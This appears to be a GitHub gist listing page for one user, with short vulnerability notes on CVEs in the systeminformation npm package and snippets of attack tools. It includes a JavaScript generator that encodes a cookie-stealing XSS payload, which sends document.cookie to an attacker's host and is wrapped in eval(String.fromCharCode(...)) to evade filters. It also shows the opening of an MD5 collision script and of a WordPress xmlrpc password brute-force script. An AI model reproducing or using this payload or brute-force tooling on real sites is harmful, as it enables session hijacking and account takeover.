Vulnerability: Command Injection - CVE-2020-26274
Package name: systeminformation.
Tested package versions: 4.31.0.
Fixed package versions: >= 4.31.1.
Description: The attacker can send an OS command into quotation marks and it going to be executed.
EffectRenan
/ CVE-2020-7778, CVE-2020-26245.md
Last active Dec 16, 2020
[systeminformation] - Prototype Pollution
View CVE-2020-7778, CVE-2020-26245.md
Vulnerability: Prototype Pollution - CVE-2020-7778, CVE-2020-26245
Package name: systeminformation.
Tested package versions: 4.30.1, 4.30.2, 4.30.4
Fixed package versions: >= 4.30.5
Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.
View CVE-2020-7752.md
Vulnerability: Command Injection - CVE-2020-7752
References:
Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10
EffectRenan
/ eval-charcode.js
Last active Aug 29, 2020
View eval-charcode.js
| function generate(host, com) { | |
| const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com; | |
| let encoded = command[0].charCodeAt(); | |
| for (var i = 1; i < command.length; i++) { | |
| encoded += ',' + command[i].charCodeAt(); | |
| } | |
| encoded = `eval(String.fromCharCode(${encoded}))`; | |
| console.log(encoded); | |
| return encoded; |
View MD5-collision.py
| # -*- coding: utf-8 -*- | |
| import multiprocessing | |
| import hashlib | |
| import random | |
| import string | |
| import sys | |
| CHARS = string.letters + string.digits | |
| def cmp_md5(substr, stop_event, str_len, start=0, size=20): | |
| global CHARS | |
| while not stop_event.is_set(): |
EffectRenan
/ xmlrpc-bruteforce.sh
Created Apr 17, 2020
View xmlrpc-bruteforce.sh
| #!/bin/bash | |
| if [[ $1 == '' || $2 == '' ]] | |
| then | |
| echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>" | |
| exit | |
| fi | |
| USER="admin" |